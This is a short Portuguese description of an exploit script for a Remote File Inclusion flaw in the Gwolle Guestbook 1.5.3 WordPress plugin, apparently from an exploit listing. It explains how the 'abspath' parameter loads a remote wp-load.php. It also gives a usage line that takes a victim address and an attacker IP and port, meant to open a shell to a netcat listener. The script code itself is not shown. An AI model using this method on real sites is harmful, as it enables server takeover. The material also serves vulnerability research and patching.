
WordPress Plugin Gwolle Guestbook 1.5.3 - Inclusão Remota de Arquivo
Este script Python explora uma vulnerabilidade crítica de Inclusão Remota de Arquivos (RFI) no plugin Gwolle Guestbook para WordPress, que pode ser explorada por um atacante não autenticado para incluir um arquivo PHP remoto e executar código arbitrário no sistema vulnerável.
O parâmetro HTTP GET "abspath" não está sendo devidamente sanitizado antes de ser usado na função require() do PHP. Um atacante remoto pode incluir um arquivo chamado 'wp-load.php' de um servidor remoto arbitrário e executar seu conteúdo no servidor web vulnerável. Para isso, o atacante precisa colocar um arquivo 'wp-load.php' malicioso na raiz de documentos do seu servidor e incluir a URL do servidor na requisição.
A exploração bem-sucedida desta vulnerabilidade pode levar ao comprometimento de toda a instalação do WordPress e pode até mesmo resultar no comprometimento de todo o servidor web.
O script requer três argumentos:
Exemplo:
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORTNota: Você precisa ter um listener netcat aberto na máquina do atacante na porta especificada.
Este script é fornecido apenas para fins educacionais. O autor não é responsável por quaisquer danos causados pelo mau uso deste script.